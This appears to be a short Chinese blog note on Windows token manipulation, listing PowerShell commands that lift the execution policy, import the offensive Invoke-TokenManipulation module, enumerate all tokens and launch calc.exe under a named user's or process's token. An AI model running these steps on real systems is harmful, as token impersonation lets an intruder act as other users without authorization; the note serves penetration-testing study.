Windows降权
使用invoke-tokenmanipulation进行降权
枚举所有令牌
PS C:\Users\SMC> Get-ExecutionPolicy
Restricted
PS C:\Users\SMC> Set-ExecutionPolicy Unrestricted
PS C:\Users\SMC\Desktop> Import-Module .\Invoke-TokenManipulation.ps1
PS C:\Users\SMC\Desktop> Invoke-TokenManipulation -Enumerate
指定用户名降权
Invoke-TokenManipulation -CreateProcess "calc.exe" -Username "DESKTOP-2SLO69L\keke"
指定进程降权
Invoke-TokenManipulation -CreateProcess "calc.exe" -Processid "4488"
--- --- --- --- From 小小leo 的博客 --- --- --- ---
浙公网安备 33010602011771号